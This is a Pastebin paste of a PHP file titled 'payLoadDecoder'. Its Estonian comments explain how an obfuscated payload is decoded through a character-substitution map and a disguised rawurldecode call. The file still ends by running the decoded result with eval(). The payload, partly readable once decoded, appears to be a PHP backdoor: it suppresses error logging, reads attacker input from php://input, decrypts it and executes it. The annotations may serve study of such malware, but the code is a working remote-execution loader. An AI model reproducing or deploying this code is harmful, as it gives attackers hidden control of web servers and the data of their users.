SHARE
TWEET

payLoadDecoder

Kriztjan Apr 8th, 2019 156 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
 1. <?php
 2. /*
 3.  * Autor: Kristjan Aas
 4.  * payloadDecoder
 5. */
 6. /* Defineeritud kasutamata muutuja */
 7. $qrwlowprc = 4934;
 8. function decodePayload( $payLoad, $characterMap ) {
 9.     $decodedPayload = '';
 10.     /*
 11.      * Loopime läbi payload'i (string'i pikkus)
 12.      * Kontrollime, kas character map'iga on kattuvaid väärtusi, kui jah, siis asendatakse payload'is olev täht charactermap'is olevaga, kui mitte, siis jäetakse see vahele.
 13.      */
 14.     for ( $i = 0; $i < strlen( $payLoad ); $i ++ ) {
 15.         $decodedPayload .= isset( $characterMap[ $payLoad[ $i ] ] ) ? $characterMap[ $payLoad[ $i ] ] : $payLoad[ $i ];
 16.     }
 17.     /* Viitab rawurldecode funktsiooni nimele liites kokku kaks string'i */
 18.     $rawUrlDecode = "rawurl" . "decode";
 19.     /* Laseme dekodeeritud payload'i läbi rawurldecode'i funktsiooni ja tagastame funktsiooni väljundina  */
 20.     return $rawUrlDecode( $decodedPayload );
 21. }
 22.  
 23. $payLoad = '%4iktk_Gas%pR%pyokG3SlD_a88r8G%py%pYi%pW%FH%iC%im%' .
 24.               '4iktk_Gas%pR%pySrj_a88r8G%py%pYi%pW%FH%iC%im%4ia88r8_8a3r8sk' .
 25.               'tj%pRi%pW%FH%iC%im%4iGas_skIa_SkIks%pRi%pW%FH%iC%im%4ikjtr8a_1Ga8_l6r8s%pRN%pW%FH%iC%im%4iktk' .
 26.               '_Gas%pR%pyIlh_ahaP1skrt_skIa%py%pYi%pW%FH%iC%im%iC%imVr8alP5%pi%pR%p4_Yww7B9%pilG%' .
 27.               'pi%p4ksaI%pW%iC%im%yH%iC%im%pi%pi%pi%pikV%pi%pR%p4ksaI%pi%' .
 28.               'pN%FC%pi%pp4P6FoFNy-a6Fl-46No-RVRF-xaPilaNN4aWi%pp%pW%' .
 29.               'iC%im%pi%pi%pi%pi%pi%pi%pi%piahks%pR%pW%FH%iC%im%yC%iC%im%iC%im%p4olsl%pi%FC%piVkSa_jas_PrtsatsG%pR%' .
 30.               'py353%Fm//kt31s%py%pW%FH%iC%im%p4olsl%pi%FC%piG3Sks%pR%pp%FC%pp%pY' .
 31.               '%p4olsl%pYp%pW%FH%iC%im%iC%im%p46x4_oaProa_olsl%pi%FC%pi6lGax4_oaProa%pR18SoaProa%pR%p4ol' .
 32.               'sl%zHN%zC%pW%pW%FH%iC%im%iC%im%p4Gato_olsl%pi%FC%pi1tGa8klSkfa%pRoaP8D3s%pR%p46x4_oa' .
 33.               'Proa_olsl%pW%pW%FH%iC%im%iC%im%p48aG1Ss%pi%FC%piGato_ols' .
 34.               'lN%pi%pR%p4Gato_olsl%pW%FH%iC%im%iC%imkV%pi%pR%pN%p48aG1Ss%pW%iC%im%yH%iC%im%' .
 35.               'pi%pi%pi%pi%p48aG1Ss%pi%FC%piGato_olslp%pR%p4Gato_olsl%pW%FH%iC%im%yC%iC%im%iC%imaP5r%pi%p48aG1Ss%' .
 36.               'FH%iC%im%iC%imV1tPskrt%pioaP8D3s%pR%p4olsl%pW%iC%im%yH%iC%im%pi%pi%' .
 37.               'pi%pi%p4r1s_olsl%pi%FC%pi%pp%pp%FH%iC%im%pi%pi%pi%pi%p4JaD%pi%FC%pi%p4_L90n90%zH%pye' .
 38.               'qqc_ewLq%py%zC%pi.%pi%p4_L90n90%zH%py09OT9Lq_T0B%py%zC%FH%iC%im%pi%pi%pi%pi%p4JaD_Sat%p' .
 39.               'i%FC%piGs8Sat%pR%p4JaD%pW%FH%iC%im%pi%iC%im%pi%pi%pi%piVr8%pi%pR%p4k%FCi%FH%pi%p4k%pi%FY%piGs8S' .
 40.               'at%pR%p4JaD%pW%FH%pi%p4k%pH%pH%pW%iC%im%pi%pi%pi%pi%yH%iC%im%pi%pi%pi%' .
 41.               'pi%pi%pi%pi%pi%p4JaD%zH%p4k%zC%pi%FC%piP58%pRr8o%pR%p' .
 42.               '4JaD%zH%p4k%zC%pW%pi%z9%pi%pR%p4JaD_Sat%pi%pz%pipzz%pW%pW%FH%iC%im%pi%pi%pi%pi' .
 43.               '%yC%iC%im%iC%im%pi%pi%pi%piVr8%pi%pR%p4k%FCi%FH%pi%p4k%FYGs8Sat%pR%p4olsl%pW%FH%pW%iC%i' .
 44.               'm%pi%pi%pi%pi%yH%iC%im%pi%pi%pi%pi%pi%pi%pi%piVr8%pi%pR%p4M%FCi%FH%pi%p4M%FYGs8Sat%pR' .
 45.               '%p4JaD%pW%pi%px%px%pi%p4k%FYGs8Sat%pR%p4olsl%pW%FH%pi%p4M%pH%pH%pY%pi%p4k%pH%pH%pW%i' .
 46.               'C%im%pi%pi%pi%pi%pi%pi%pi%pi%yH%iC%im%pi%pi%pi%pi%pi%pi%pi%pi%pi%pi%pi%pi%p4r1' .
 47.               's_olsl%pi.%FC%piP58%pRr8o%pR%p4olsl%zH%p4k%zC%pW%pi%z9%pir8o%pR%p4JaD%zH' .
 48.               '%p4M%zC%pW%pW%FH%iC%im%pi%pi%pi%pi%pi%pi%pi%pi%yC%iC%im%pi%pi%pi%pi%yC%iC%im%iC%im%' .
 49.               'pi%pi%pi%pi8as18t%pi%p4r1s_olsl%FH%iC%im%yC%iC%im%iC%imV1tPskrt%piGato_olslN%pR%p4olsl%pW%iC%' .
 50.               'im%yH%iC%im%pi%pi%pi%pi%p45alo%pi%FC%pi%pp%pp%FH%i' .
 51.               'C%im%iC%im%pi%pi%pi%piVr8alP5%pR%p4olsl%zH%pp5aloa8G%pp%zC%pilG%pi%p' .
 52.               '4JaD%FC%F9%p4ElS1a%pW%iC%im%pi%pi%pi%pi%yH%iC%im%pi%pi%pi%pi%pi%pi%pi%pi%p45alo%pi.%FC%pi%' .
 53.               'p4JaD%pi.%pi%pp%Fm%pi%pp%pi.%pi%p4ElS1a%pi.%pi%pp%zY8%zYt%pp%FH%iC%im' .
 54.               '%pi%pi%pi%pi%yC%iC%im%iC%im%pi%pi%pi%pi%p43l8lIG%pi%FC' .
 55.               '%pil88lD%pR%py5ss3%py%pi%FC%F9%pil88lD%pR%iC%im%pi%pi%pi%pi%pi%pi%pi%pi%' .
 56.               'pyIas5ro%py%pi%FC%F9%pi%p4olsl%zH%ppIas5ro%pp%zC%pY%iC%' .
 57.               'im%pi%pi%pi%pi%pi%pi%pi%pi%py5aloa8%py%pi%FC%F9%pi%p45alo%pY%iC%im%pi%pi%pi%p' .
 58.               'i%pi%pi%pi%pi%pyPrtsats%py%pi%FC%F9%pi%p4olsl%zH%pp6roD%pp' .
 59.               '%zC%pY%iC%im%pi%pi%pi%pi%pi%pi%pi%pi%pyskIar1s%py%pi%FC%F9%pi%p4olsl%zH%ppskIar1s' .
 60.               '%pp%zC%pY%iC%im%pi%pi%pi%pi%pi%pi%pi%pi%iC%im%pi%pi%pi%pi%pW%pW%FH%iC%im%iC%im%pi%pi%pi%pi%p4Psh%p' .
 61.               'i%FC%piGs8alI_Prtsahs_P8alsa%pR%p43l8lIG%pW%FH%iC%im%pi%pi%pi%pi%iC%im%pi%pi%pi%pi%p48aG1Ss%pi%FC' .
 62.               '%pi%4iVkSa_jas_PrtsatsG%pR%p4olsl%zH%pp18S%pp%zC%pY%pivmXL9%pY%pi%p4Psh%pW%FH%iC%im%iC%' .
 63.               'im%pi%pi%pi%pikV%pi%pR%p45ss3_8aG3rtGa_5aloa8%pW%iC%im%pi%' .
 64.               'pi%pi%pi%yH%iC%im%pi%pi%pi%pi%pi%pi%pi%pikV%pi%pRGs83rG%pR%p45s' .
 65.               's3_8aG3rtGa_5aloa8%zHi%zC%pY%pi%pppii%pp%pW%pi%FC%FC%FC%pivmXL9%pW%iC%im%pi%pi%pi%pi%pi%pi%pi%p' .
 66.               'i%yH%iC%im%pi%pi%pi%pi%pi%pi%pi%pi%pi%pi%pi%pi%p48aG1Ss%pi%FC%pi%p' .
 67.               'peqqc_900w0%zYs%pp%pi.%pi%p45ss3_8aG3rtGa_5aloa8%zHi%zC%FH%iC%im%pi%p' .
 68.               'i%pi%pi%pi%pi%pi%pi%yC%iC%im%pi%pi%pi%pi%yC%iC%im%' .
 69.               'pi%pi%pi%piaSGa%iC%im%pi%pi%pi%pi%yH%iC%im%pi%pi%pi%pi%pi%pi%pi%pi%p48aG1Ss%pi%FC%pi%pp' .
 70.               'YwAA9YqBwA_900w0%pp%FH%iC%im%pi%pi%pi%pi%yC%iC%im%iC%im%' .
 71.               'pi%pi%pi%pi8as18t%pi%p48aG1Ss%FH%iC%im%yC%iC%im%iC%imV' .
 72.               '1tPskrt%piGato_olslp%pR%p4olsl%pW%iC%im%yH%iC%im%pi%pi%pi%pi//%pi1Ga%piGrPJasG%iC%im%yC';
 73.  
 74. $characterMap = Array(
 75.     '1' => 'u',
 76.     '0' => 'R',
 77.     '3' => 'p',
 78.     '2' => 'Y',
 79.     '5' => 'h',
 80.     '4' => '4',
 81.     '7' => 'K',
 82.     '6' => 'b',
 83.     '9' => 'E',
 84.     '8' => 'r',
 85.     'A' => 'N',
 86.     'C' => 'D',
 87.     'B' => 'I',
 88.     'E' => 'v',
 89.     'D' => 'y',
 90.     'G' => 's',
 91.     'F' => '3',
 92.     'I' => 'm',
 93.     'H' => 'B',
 94.     'K' => 'W',
 95.     'J' => 'k',
 96.     'M' => 'j',
 97.     'L' => 'S',
 98.     'O' => 'Q',
 99.     'N' => '1',
 100.     'Q' => 'w',
 101.     'P' => 'c',
 102.     'S' => 'l',
 103.     'R' => '8',
 104.     'U' => 'X',
 105.     'T' => 'U',
 106.     'W' => '9',
 107.     'V' => 'f',
 108.     'Y' => 'C',
 109.     'X' => 'L',
 110.     'Z' => 'q',
 111.     'a' => 'e',
 112.     'c' => 'P',
 113.     'b' => 'M',
 114.     'e' => 'H',
 115.     'd' => 'G',
 116.     'g' => 'Z',
 117.     'f' => 'z',
 118.     'i' => '0',
 119.     'h' => 'x',
 120.     'k' => 'i',
 121.     'j' => 'g',
 122.     'm' => 'A',
 123.     'l' => 'a',
 124.     'o' => 'd',
 125.     'n' => 'V',
 126.     'q' => 'T',
 127.     'p' => '2',
 128.     's' => 't',
 129.     'r' => 'o',
 130.     'u' => 'J',
 131.     't' => 'n',
 132.     'w' => 'O',
 133.     'v' => 'F',
 134.     'y' => '7',
 135.     'x' => '6',
 136.     'z' => '5'
 137. );
 138.  
 139. /* Käivitame dekodeeritud payload'i PHP koodi */
 140. eval ( decodePayload( $payLoad, $characterMap ) );
 141.  
 142.  
 143. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top